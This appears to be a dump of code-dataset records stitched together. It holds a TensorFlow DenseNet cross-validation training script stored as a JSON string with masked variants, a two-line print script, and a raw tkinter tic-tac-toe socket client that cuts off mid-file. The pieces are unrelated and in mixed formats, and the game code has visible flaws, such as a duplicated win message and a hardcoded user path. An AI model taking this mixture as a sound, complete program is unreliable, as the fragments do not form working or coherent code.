model)\ndensenet('2', 'org', 2, model)\ndensenet('2', 'org', 3, model)\ndensenet('2', 'org', 4, model)\ndensenet('2', 'org', 5, model)\ndensenet('2', 'aug', 1, model)\ndensenet('2', 'aug', 2, model)\ndensenet('2', 'aug', 3, model)\ndensenet('2', 'aug', 4, model)\ndensenet('2', 'aug', 5, model)\ndensenet('3', 'org', 1, model)\ndensenet('3', 'org', 2, model)\ndensenet('3', 'org', 3, model)\ndensenet('3', 'org', 4, model)\ndensenet('3', 'org', 5, model)\ndensenet('3', 'aug', 1, model)\ndensenet('3', 'aug', 2, model)\ndensenet('3', 'aug', 3, model)\ndensenet('3', 'aug', 4, model)\ndensenet('3', 'aug', 5, model)\n",
"step-5": "def densenet(D,DT,F,model):\r\n import scipy.io as sio\r\n import time\r\n import os\r\n import math\r\n import numpy as np\r\n import matplotlib.pyplot as plt\r\n\r\n\r\n Dataset = D\r\n if DT == 'org':\r\n data_type = 'original'\r\n else:\r\n data_type = 'augmented'\r\n\r\n fs = model.fs\r\n fm1 = model.fm1\r\n batch_size = model.batch_size[0] \r\n learn_rate = model.learn_rate\r\n num_layers = model.num_layers\r\n k_fm = model.k_fm\r\n bottleneck = model.bottleneck\r\n dropout_prob = model.dropout_prob\r\n num_of_test = model.num_of_test\r\n\r\n ###############\r\n # load training / testing set from CrossVal folder,\r\n # names for training set, 'D1_1st_fold_train.mat', 'Augmented_D1_1st_fold_train.mat'\r\n # name for testing set, 'D1_1st_fold_test.mat'\r\n ###############\r\n if F == 1:\r\n file_name = '1st_fold'\r\n elif F == 2:\r\n file_name = '2nd_fold'\r\n elif F == 3:\r\n file_name = '3rd_fold'\r\n elif F == 4:\r\n file_name = '4th_fold'\r\n elif F == 5:\r\n file_name = '5th_fold'\r\n path = os.path.join('CrossVal', 'D'+Dataset)\r\n print(\"path \" ,path)\r\n if data_type == 'original':\r\n Train =sio.loadmat(os.path.join(path, 'D'+Dataset+'_'+file_name+'_train.mat'))\r\n else:\r\n Train =sio.loadmat(os.path.join(path, 'Augmented_D'+Dataset+'_'+file_name+'_train.mat'))\r\n Test = sio.loadmat(os.path.join(path, 'D'+Dataset+'_'+file_name+'_test.mat'))\r\n\r\n if Dataset == '1':\r\n number_of_classes = 24\r\n num_of_ep = 50\r\n num_of_test = 20\r\n if data_type == 'augmented':\r\n train_imgs = 526190\r\n else:\r\n train_imgs = 52619\r\n iteration = math.ceil((num_of_ep * train_imgs) / batch_size)\r\n elif Dataset == '2':\r\n number_of_classes = 36\r\n num_of_ep = 200\r\n if data_type == 'augmented':\r\n train_imgs = 20120\r\n else:\r\n train_imgs = 2012\r\n iteration = math.ceil((num_of_ep * train_imgs) / batch_size)\r\n else:\r\n number_of_classes = 10\r\n num_of_ep = 200\r\n if data_type == 'augmented':\r\n train_imgs = 16000\r\n else:\r\n train_imgs = 1600\r\n iteration = math.ceil((num_of_ep * train_imgs) / batch_size)\r\n\r\n iteration_to_display = int(iteration / num_of_test) \r\n list_to_display = []\r\n for i in range(num_of_test):\r\n if i !=num_of_test:\r\n list_to_display.append(int(iteration_to_display*(i+1)))\r\n del i\r\n\r\n\r\n total_fm_Block_1 = fm1+(num_layers*k_fm)\r\n total_fm_Block_2 = total_fm_Block_1+(num_layers*k_fm)\r\n total_fm_Block_3 = total_fm_Block_2+(num_layers*k_fm)\r\n fc_nodes = [total_fm_Block_3 ]\r\n\r\n\r\n Train_Images = Train['trainImages']\r\n Train_Labels = Train['trainLabels2']\r\n total_trainImages = len(Train_Images[0,2])\r\n print(total_trainImages)\r\n Train_Images = Train_Images.reshape(784,total_trainImages).transpose().astype('float32')\r\n Train_Labels = Train_Labels.transpose().astype('float64')\r\n\r\n\r\n Test_Images = Test['testImages']\r\n Test_Labels = Test['testLabels2']\r\n total_testImages = len(Test_Images[0,2])\r\n Test_Images = Test_Images.reshape(784,total_testImages).transpose().astype('float32')\r\n Test_Labels = Test_Labels.transpose().astype('float64')\r\n Target_labels = np.argmax(Test_Labels,axis=1)\r\n\r\n del Test\r\n del Train\r\n\r\n import tensorflow as tf\r\n tf.reset_default_graph()\r\n g = tf.Graph()\r\n with g.as_default():\r\n tf.set_random_seed(1)\r\n\r\n def weight_variable(shape,n):\r\n initial = tf.truncated_normal(shape, stddev=0.1)\r\n return tf.Variable(initial,name=n)\r\n\r\n def bias_variable(shape,n):\r\n initial = tf.constant(0.1, shape=shape)\r\n return 
tf.Variable(initial,name=n)\r\n\r\n def avg_pool(input, s):\r\n return tf.nn.avg_pool(input, [ 1, s, s, 1 ], [1, s, s, 1 ], 'SAME')\r\n\r\n def max_pool(input, s):\r\n return tf.nn.max_pool(input, [ 1, s, s, 1 ], [1, s, s, 1 ], 'SAME')\r\n\r\n def conv2d_1(input, in_features, out_features, kernel_size, name=\"W\", with_bias=False):\r\n W = weight_variable([ kernel_size, kernel_size, in_features, out_features], name)\r\n conv = tf.nn.conv2d(input, W, [ 1, 1, 1, 1 ], padding='SAME')\r\n if with_bias:\r\n return conv + bias_variable([ out_features ])\r\n return conv\r\n\r\n def batch_activ_conv(current, in_features, out_features, kernel_size, is_training, keep_prob, idx, scope='conv_block'):\r\n with tf.variable_scope(scope):\r\n current = tf.layers.batch_normalization(current, scale=True, training=is_training)\r\n current = tf.nn.relu(current)\r\n current = conv2d_1(current, in_features, out_features, kernel_size, name=\"W\"+str(idx))\r\n current = tf.nn.dropout(current, keep_prob)\r\n return current\r\n\r\n def block(input, layers, in_features, growth, is_training, keep_prob, name=\"Block_\"):\r\n with tf.name_scope(name):\r\n with tf.variable_scope(name):\r\n current = input\r\n features = in_features\r\n for idx in range(layers):\r\n tmp = batch_activ_conv(current, features, growth, fs, is_training, keep_prob, idx+1, scope='conv_block_'+str(idx+1))\r\n current = tf.concat((current, tmp), axis=3)\r\n features += growth\r\n return current, features\r\n\r\n\r\n x = tf.placeholder(tf.float32, shape=[None, 784])\r\n y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])\r\n x_image = tf.reshape(x, [-1, 28, 28, 1])\r\n keep_prob = tf.placeholder(tf.float32)\r\n training = tf.placeholder(tf.bool)\r\n\r\n\r\n current = conv2d_1(x_image, 1, fm1, fs, name=\"W1\", with_bias=False)\r\n\r\n current, features = block(current, num_layers, fm1, k_fm, training, keep_prob, name=\"Block_1\")\r\n b1_conv_printop = tf.Print(current, [current])\r\n with tf.name_scope(\"transition_lyr\"):\r\n #current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_1')\r\n current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_1')\r\n t1_b_conv_printop = tf.Print(current, [current])\r\n current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_1_1')\r\n t1_conv_printop = tf.Print(current, [current])\r\n current = max_pool(current, 2)\r\n #current = avg_pool(current, 2)\r\n current, features = block(current, num_layers, features, k_fm, training, keep_prob, name=\"Block_2\")\r\n b2_conv_printop = tf.Print(current, [current])\r\n with tf.name_scope(\"transition_lyr_2\"):\r\n #current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_2')\r\n current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_2')\r\n t2_b_conv_printop = tf.Print(current, [current])\r\n current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_2_1')\r\n t2_conv_printop = tf.Print(current, [current])\r\n current = max_pool(current, 2)\r\n #current = avg_pool(current, 2)\r\n current, features = block(current, num_layers, features, k_fm, training, keep_prob, name=\"Block_3\")\r\n b3_conv_printop = tf.Print(current, [current])\r\n with tf.name_scope(\"transition_lyr_3\"):\r\n #current = batch_activ_conv(current, features, features, 
1, training, keep_prob, 1, scope='Transition_layer_3')\r\n current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_3')\r\n t3_b_conv_printop = tf.Print(current, [current])\r\n current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_3_1')\r\n t3_conv_printop = tf.Print(current, [current])\r\n current = avg_pool(current, 7)\r\n current = tf.reshape(current, [tf.shape(current)[0], -1])\r\n\r\n with tf.name_scope(\"Dense_Last_lyr\"):\r\n W_fc3 = weight_variable([fc_nodes[0], number_of_classes],\"w_fc3\")\r\n b_fc3 = bias_variable([number_of_classes],\"b_fc3\")\r\n y_conv = tf.matmul(current, W_fc3) + b_fc3\r\n prediction_prob = tf.nn.softmax(y_conv)\r\n prediction_prob_printop = tf.Print(prediction_prob, [prediction_prob])\r\n\r\n with tf.name_scope(\"Xent\"):\r\n cross_entropy = tf.reduce_mean(\r\n tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))\r\n\r\n with tf.name_scope(\"train\"):\r\n extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\r\n with tf.control_dependencies(extra_update_ops):\r\n train_step = tf.train.AdamOptimizer(learn_rate).minimize(cross_entropy)\r\n\r\n with tf.name_scope(\"accuracy\"):\r\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\r\n wrong_prediction_printop = tf.Print(wrong_prediction, [wrong_prediction])\r\n predicted_labels = tf.argmax(y_conv, 1)\r\n predicted_labels_printop = tf.Print(predicted_labels, [predicted_labels])\r\n\r\n index = 0\r\n index_end = index + batch_size\r\n remaining = 0\r\n start_time = time.time()\r\n costs = []\r\n accuracy_list = []\r\n list_of_predicted_list = []\r\n\r\n with tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer(),tf.set_random_seed(0))\r\n for i in range(iteration):\r\n if index_end > total_trainImages:\r\n remaining = total_trainImages - (index_end-batch_size) \r\n images = Train_Images[(index_end-batch_size):total_trainImages, :]\r\n labels = Train_Labels[(index_end-batch_size):total_trainImages, :]\r\n index = 0\r\n index_end = index + batch_size - remaining\r\n images = np.vstack((images, Train_Images[index:index_end, :]))\r\n labels = np.vstack((labels, Train_Labels[index:index_end, :]))\r\n batch = (images, labels)\r\n index = index_end\r\n index_end = index + batch_size\r\n else:\r\n batch = (Train_Images[index:index_end, :], Train_Labels[index:index_end, :])\r\n index = index + batch_size \r\n index_end = index_end + batch_size\r\n\r\n if i in list_to_display:\r\n elapsed_time = time.time() - start_time\r\n print('Elapsed Time Before for loop: %f secs' % elapsed_time)\r\n Accuracy = 0\r\n itrt_index = i\r\n print('debug: %d & %d' % (iteration,i))\r\n\r\n if Dataset == '1':\r\n if file_name == '5th_fold':\r\n num_test = 13154\r\n else:\r\n num_test = 13155\r\n elif Dataset == '2':\r\n num_test = 503\r\n elif Dataset == '3':\r\n num_test = 400\r\n print(num_test)\r\n\r\n for img_index in range(num_test):\r\n t_image = np.array(Test_Images[img_index,:]).reshape(1,784)\r\n t_label = np.array(Test_Labels[img_index,:]).reshape(1,number_of_classes)\r\n test_acc = accuracy.eval(feed_dict={\r\n x: t_image, y_: t_label,\r\n keep_prob: 1.0, training:False})\r\n Accuracy += test_acc\r\n wrong, predicted, prediction_prob = sess.run([wrong_prediction_printop, \r\n 
predicted_labels_printop,prediction_prob_printop], \r\n feed_dict={\r\n x: t_image, y_: t_label, \r\n keep_prob: 1.0, training:False})\r\n if img_index <= 3:\r\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([b1_conv_printop, b2_conv_printop, b3_conv_printop,\r\n t1_conv_printop,t2_conv_printop, t3_conv_printop, t1_b_conv_printop, t2_b_conv_printop, t3_b_conv_printop], \r\n feed_dict={\r\n x: t_image, y_: t_label, \r\n keep_prob: 1.0, training:False})\r\n if img_index == 0:\r\n b1_list = b1\r\n b2_list = b2\r\n b3_list = b3\r\n t1_list = t1\r\n t2_list = t2\r\n t3_list = t3\r\n t1_b_list = t1_b\r\n t2_b_list = t2_b\r\n t3_b_list = t3_b\r\n else:\r\n b1_list = np.append(b1_list,b1,axis=0)\r\n b2_list = np.append(b2_list,b2,axis=0)\r\n b3_list = np.append(b3_list,b3,axis=0)\r\n t1_list = np.append(t1_list,t1,axis=0)\r\n t2_list = np.append(t2_list,t2,axis=0)\r\n t3_list = np.append(t3_list,t3,axis=0)\r\n t1_b_list = np.append(t1_b_list,t1_b,axis=0)\r\n t2_b_list = np.append(t2_b_list,t2_b,axis=0)\r\n t3_b_list = np.append(t3_b_list,t3_b,axis=0) \r\n if img_index == 0 :\r\n wrong_list_1 = wrong\r\n predicted_list_1 = predicted\r\n prediction_prob_1 = prediction_prob\r\n else:\r\n wrong_list_1 = np.append(wrong_list_1,wrong,axis=0)\r\n predicted_list_1 = np.append(predicted_list_1,predicted,axis=0)\r\n prediction_prob_1 = np.append(prediction_prob_1, prediction_prob)\r\n\r\n\r\n Accuracy = Accuracy/num_test\r\n accuracy_list.append(Accuracy)\r\n list_of_predicted_list.append(predicted_list_1)\r\n print('Average test accuracy: %g' % Accuracy)\r\n epoch_around = math.ceil((itrt_index * batch_size) / total_trainImages)\r\n sio.savemat('D'+Dataset+'_'+file_name+'_'+str(epoch_around)+'ep_'+data_type+'_predicted_labels_list.mat', {'wrong_list':wrong_list_1, 'predicted_list': predicted_list_1, 'Target_labels':Target_labels, \r\n 'prediction_prob':prediction_prob, 'b1_list':b1_list, 'b2_list':b2_list, 'b3_list':b3_list, 't1_list':t1_list,\r\n 't2_list':t2_list, 't3_list':t3_list, 't1_b_list':t1_b_list, 't2_b_list':t2_b_list, 't3_b_list':t3_b_list})\r\n\r\n elapsed_time = time.time() - start_time\r\n print('Elapsed Time: %f secs' % elapsed_time)\r\n print('Batch Size & Iteration & Total Train Imgs : %d & %d & %d' % (batch_size, itrt_index, total_trainImages)) \r\n print('learning_rate : %g ' % learn_rate)\r\n print('1st conv FMaps : %d ' % fm1) \r\n print('number of layers in dense block : %d ' % num_layers) \r\n print('growth rate(k_fm) : %d ' % k_fm)\r\n print('filter size : %d ' % fs)\r\n print('bottleneck : %d' % bottleneck)\r\n print('dropout prob : %g ' % dropout_prob)\r\n print('data_type :', data_type)\r\n\r\n print('file_name :', file_name)\r\n\r\n print('FC nodes : %d' % fc_nodes[0])\r\n\r\n epoch_around = (itrt_index * batch_size) / total_trainImages\r\n print('Number of epochs : %f ' % epoch_around)\r\n\r\n # plot the cost\r\n plt.plot(np.squeeze(costs))\r\n plt.ylabel('cost')\r\n plt.xlabel('iterations (per tens)')\r\n plt.title(\"Learning rate =\" + str(learn_rate))\r\n plt.show()\r\n\r\n if i % 100 == 0:\r\n train_accuracy = accuracy.eval(feed_dict={\r\n x: batch[0], y_: batch[1], \r\n keep_prob: 1.0, training:False})\r\n print('step %d, training accuracy %g' % (i, train_accuracy))\r\n _, loss = sess.run([train_step, cross_entropy], \r\n feed_dict={x: batch[0], y_: batch[1], \r\n keep_prob: dropout_prob, training:True})\r\n\r\n iteration_cost = 0 # Defines a cost related to an epoch\r\n num_minibatches = int(total_trainImages / batch_size) # number of minibatches of size 
minibatch_size in the train set \r\n iteration_cost += loss / num_minibatches\r\n costs.append(iteration_cost)\r\n if i % 100 == 0:\r\n print ('Loss: ',loss)\r\n\r\n\r\n Accuracy = 0\r\n training_time = time.time() - start_time\r\n print('Training Time: %f secs' % training_time)\r\n\r\n\r\n if Dataset == '1':\r\n if file_name == '5th_fold':\r\n num_test = 13154\r\n else:\r\n num_test = 13155\r\n elif Dataset == '2':\r\n num_test = 503\r\n elif Dataset == '3':\r\n num_test = 400\r\n print(num_test)\r\n\r\n for img_index in range(num_test):\r\n t_image = np.array(Test_Images[img_index,:]).reshape(1,784)\r\n t_label = np.array(Test_Labels[img_index,:]).reshape(1,number_of_classes)\r\n test_acc = accuracy.eval(feed_dict={\r\n x: t_image, y_: t_label,\r\n keep_prob: 1.0, training:False})\r\n Accuracy += test_acc\r\n wrong, predicted = sess.run([wrong_prediction_printop, predicted_labels_printop], feed_dict={\r\n x: t_image, y_: t_label, \r\n keep_prob: 1.0, training:False})\r\n if img_index <= 3:\r\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([b1_conv_printop, b2_conv_printop, b3_conv_printop,\r\n t1_conv_printop,t2_conv_printop, t3_conv_printop, t1_b_conv_printop, t2_b_conv_printop, t3_b_conv_printop], \r\n feed_dict={\r\n x: t_image, y_: t_label, \r\n keep_prob: 1.0, training:False})\r\n if img_index == 0:\r\n b1_list = b1\r\n b2_list = b2\r\n b3_list = b3\r\n t1_list = t1\r\n t2_list = t2\r\n t3_list = t3\r\n t1_b_list = t1_b\r\n t2_b_list = t2_b\r\n t3_b_list = t3_b\r\n else:\r\n b1_list = np.append(b1_list,b1,axis=0)\r\n b2_list = np.append(b2_list,b2,axis=0)\r\n b3_list = np.append(b3_list,b3,axis=0)\r\n t1_list = np.append(t1_list,t1,axis=0)\r\n t2_list = np.append(t2_list,t2,axis=0)\r\n t3_list = np.append(t3_list,t3,axis=0)\r\n t1_b_list = np.append(t1_b_list,t1_b,axis=0)\r\n t2_b_list = np.append(t2_b_list,t2_b,axis=0)\r\n t3_b_list = np.append(t3_b_list,t3_b,axis=0) \r\n if img_index == 0 :\r\n wrong_list = wrong\r\n predicted_list = predicted\r\n else:\r\n wrong_list = np.append(wrong_list,wrong,axis=0)\r\n predicted_list = np.append(predicted_list,predicted,axis=0)\r\n\r\n\r\n Accuracy = Accuracy/num_test\r\n print('Average test accuracy: %g' % Accuracy)\r\n accuracy_list.append(Accuracy)\r\n list_of_predicted_list.append(predicted_list)\r\n\r\n elapsed_time = time.time() - start_time\r\n print('Elapsed Time: %f secs' % elapsed_time)\r\n print('Batch Size & Iteration & Total Train Imgs : %d & %d & %d' % (batch_size, itrt_index, total_trainImages)) \r\n print('learning_rate : %g ' % learn_rate)\r\n print('1st conv FMaps : %d ' % fm1) \r\n print('number of layers in dense block : %d ' % num_layers) \r\n print('growth rate(k_fm) : %d ' % k_fm)\r\n print('filter size : %d ' % fs)\r\n print('bottleneck : %d' % bottleneck)\r\n print('dropout prob : %g ' % dropout_prob)\r\n print('data_type :', data_type)\r\n\r\n print('file_name :', file_name)\r\n\r\n print('FC nodes : %d' % fc_nodes[0])\r\n\r\n epoch_around = math.ceil((iteration * batch_size) / total_trainImages)\r\n if epoch_around == 51:\r\n epoch_around = 50\r\n print('Number of epochs : %f ' % epoch_around)\r\n\r\n\r\n # plot the cost\r\n plt.plot(np.squeeze(costs))\r\n plt.ylabel('cost')\r\n plt.xlabel('iterations (per tens)')\r\n plt.title(\"Learning rate =\" + str(learn_rate))\r\n plt.show()\r\n\r\n sio.savemat('D'+Dataset+'_'+file_name+'_'+str(epoch_around)+'ep_'+data_type+'_predicted_labels_list.mat', {'wrong_list':wrong_list, 'predicted_list': predicted_list, 'Target_labels':Target_labels, 
'accuracy_list':accuracy_list, 'list_of_predicted_list':list_of_predicted_list, 'costs':costs, 'b1_list':b1_list, 'b2_list':b2_list, 'b3_list':b3_list, 't1_list':t1_list,\r\n 't2_list':t2_list, 't3_list':t3_list, 't1_b_list':t1_b_list, 't2_b_list':t2_b_list, 't3_b_list':t3_b_list})\r\n \r\n \r\nclass MyModel:\r\n num_layers = 4\r\n k_fm = 24\r\n fs = 3\r\n fm1 = 32\r\n bottleneck = 4\r\n dropout_prob = 0.8\r\n batch_size = [16]\r\n learn_rate = 0.001\r\n num_of_test = 40\r\n\r\nmodel = MyModel()\r\n \r\n\r\ndensenet('1','org',1,model)\r\ndensenet('1','org',2,model)\r\ndensenet('1','org',3,model)\r\ndensenet('1','org',4,model)\r\ndensenet('1','org',5,model)\r\n\r\ndensenet('1','aug',1,model)\r\ndensenet('1','aug',2,model)\r\ndensenet('1','aug',3,model)\r\ndensenet('1','aug',4,model)\r\ndensenet('1','aug',5,model)\r\n\r\ndensenet('2','org',1,model)\r\ndensenet('2','org',2,model)\r\ndensenet('2','org',3,model)\r\ndensenet('2','org',4,model)\r\ndensenet('2','org',5,model)\r\n \r\ndensenet('2','aug',1,model)\r\ndensenet('2','aug',2,model)\r\ndensenet('2','aug',3,model)\r\ndensenet('2','aug',4,model)\r\ndensenet('2','aug',5,model)\r\n\r\ndensenet('3','org',1,model)\r\ndensenet('3','org',2,model)\r\ndensenet('3','org',3,model)\r\ndensenet('3','org',4,model)\r\ndensenet('3','org',5,model)\r\n\r\ndensenet('3','aug',1,model)\r\ndensenet('3','aug',2,model)\r\ndensenet('3','aug',3,model)\r\ndensenet('3','aug',4,model)\r\ndensenet('3','aug',5,model)\r\n",
"step-ids": [
1,
2,
3,
5,
6
]
}
|
[
1,
2,
3,
5,
6
] |
# Author: Andreas Francois Vermeulen
print("CrawlerSlaveYoke")
print("CSY-000000023.py")
|
normal
|
{
"blob_id": "322795bce189428823c45a26477555052c7d5022",
"index": 8933,
"step-1": "<mask token>\n",
"step-2": "print('CrawlerSlaveYoke')\nprint('CSY-000000023.py')\n",
"step-3": "# Author: Andreas Francois Vermeulen\nprint(\"CrawlerSlaveYoke\")\nprint(\"CSY-000000023.py\")\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
from PIL import Image, ImageTk
import time
import socket
import threading
root = Tk()
root.title("Tic-Tac-Toe")
root.geometry('600x600')
winner = False
def start_thread(target):
thread = threading.Thread(target=target)
thread.daemon = True
thread.start()
HOST = '127.0.0.1'
PORT = 65432
global connection_established
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
connection_established = True
def receive_data():
while True:
data = sock.recv(1024).decode()
print('decoded is',data)
if data == 'button':
labels.config(text="My Turn or O's Turn")
b1.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b1.config(state="disabled")
elif data == 'button2' :
labels.config(text="My Turn or O's Turn")
b2.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b2.config(state="disabled")
elif data == 'button3' :
labels.config(text="My Turn or O's Turn")
b3.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b3.config(state="disabled")
elif data == 'button4' :
labels.config(text="My Turn or O's Turn")
b4.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b4.config(state="disabled")
elif data == 'button5' :
labels.config(text="My Turn or O's Turn")
b5.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b5.config(state="disabled")
elif data == 'button6' :
labels.config(text="My Turn or O's Turn")
b6.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b6.config(state="disabled")
elif data == 'button7' :
labels.config(text="My Turn or O's Turn")
b7.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b7.config(state="disabled")
elif data == 'button8' :
labels.config(text="My Turn or O's Turn")
b8.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b8.config(state="disabled")
elif data == 'button9' :
labels.config(text="My Turn or O's Turn")
b9.config(text='X')
for w in New.winfo_children():
w.configure(state="normal")
b9.config(state="disabled")
start_thread(receive_data)
def resize_image(event):
new_width = event.width
new_height = event.height
image = copy_of_image.resize((new_width, new_height))
photo = ImageTk.PhotoImage(image)
label.config(image = photo)
label.image = photo #avoid garbage collection
image = Image.open('C:\\Users\\User\\Any_Path\\Tic-tac-toe1.png')
copy_of_image = image.copy()
photo = ImageTk.PhotoImage(image)
label = ttk.Label(root, image = photo)
label.bind('<Configure>', resize_image)
label.pack(fill=BOTH, expand = YES)
root.after(5000, lambda: root.destroy()) # Destroy the splash window after 5 seconds
root.mainloop()
New = Tk()
New.title('Tic-Tac-Toe')
New.iconbitmap('C:/Users/jainh/Downloads/Tic-tac-toe1.png')  # note: iconbitmap normally expects a .ico file; a .png here may raise TclError
clicked = 'Y'
def checkwin():
global winner
winner = False
if b1["text"] == "X" and b2["text"] == "X" and b3["text"] == "X":
b1.config(bg='green')
b2.config(bg='green')
b3.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
elif b4["text"] == "X" and b5["text"] == "X" and b6["text"] == "X":
b4.config(bg='green')
b5.config(bg='green')
b6.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
elif b7["text"] == "X" and b8["text"] == "X" and b9["text"] == "X":
b7.config(bg='green')
b8.config(bg='green')
b9.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
elif b1["text"] == "X" and b4["text"] == "X" and b7["text"] == "X":
b1.config(bg='green')
b4.config(bg='green')
b7.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
elif b2["text"] == "X" and b5["text"] == "X" and b8["text"] == "X":
b2.config(bg='green')
b5.config(bg='green')
b8.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
elif b3["text"] == "X" and b6["text"] == "X" and b9["text"] == "X":
b3.config(bg='green')
b6.config(bg='green')
b9.config(bg='green')
winner = True
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
elif b1["text"] == "X" and b5["text"] == "X" and b9["text"] == "X":
b1.config(bg='green')
b5.config(bg='green')
b9.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
elif b3["text"] == "X" and b5["text"] == "X" and b7["text"] == "X":
b3.config(bg='green')
b5.config(bg='green')
b7.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!X Wins!!!!!!!!")
###################################
elif b1["text"] == "O" and b2["text"] == "O" and b3["text"] == "O":
b1.config(bg='green')
b2.config(bg='green')
b3.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!O Wins!!!!!!!!")
elif b4["text"] == "O" and b5["text"] == "O" and b6["text"] == "O":
b4.config(bg='green')
b5.config(bg='green')
b6.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!O Wins!!!!!!!!")
elif b7["text"] == "O" and b8["text"] == "O" and b9["text"] == "O":
b7.config(bg='green')
b8.config(bg='green')
b9.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!O Wins!!!!!!!!")
elif b1["text"] == "O" and b4["text"] == "O" and b7["text"] == "O":
b1.config(bg='green')
b4.config(bg='green')
b7.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!O Wins!!!!!!!!")
elif b2["text"] == "O" and b5["text"] == "O" and b8["text"] == "O":
b2.config(bg='green')
b5.config(bg='green')
b8.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!O Wins!!!!!!!!")
elif b3["text"] == "O" and b6["text"] == "O" and b9["text"] == "O":
b3.config(bg='green')
b6.config(bg='green')
b9.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!O Wins!!!!!!!!")
elif b1["text"] == "O" and b5["text"] == "O" and b9["text"] == "O":
b1.config(bg='green')
b5.config(bg='green')
b9.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo('Winner',"Congo!!!!!!!O Wins!!!!!!!!")
elif b3["text"] == "O" and b5["text"] == "O" and b7["text"] == "O":
b3.config(bg='green')
b5.config(bg='green')
b7.config(bg='green')
winner = True
for w in New.winfo_children():
w.configure(state="disabled")
messagebox.showinfo("Winner","Congo!!!!!!!O Wins!!!!!!!!")
def b_click(b):
    # str(b) is the Tk widget path (e.g. '.!button3'); stripping '.' and '!'
    # yields the token ('button3') that the opponent's client listens for
    to_send = str(b)
    to_send = to_send.replace('.', '')
    to_send = str(to_send.replace('!', ''))
    print(to_send)
global clicked
if b["text"] == '' and b['state'] != 'disabled' :
labels.config(text="X's Turn")
b.configure(state=DISABLED)
b['text'] = 'O'
checkwin()
if connection_established == True:
sock.send(to_send.encode())
for w in New.winfo_children():
w.configure(state="disabled")
b1 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b1))
b1.grid(row=0,column=0)
b2 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b2))
b2.grid(row=0,column=1)
b3 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b3))
b3.grid(row=0,column=2)
b4 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b4))
b4.grid(row=1,column=0)
b5 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b5))
b5.grid(row=1,column=1)
b6 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b6))
b6.grid(row=1,column=2)
b7 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg="SystemButtonFace",command=lambda:b_click(b7))
b7.grid(row=2,column=0)
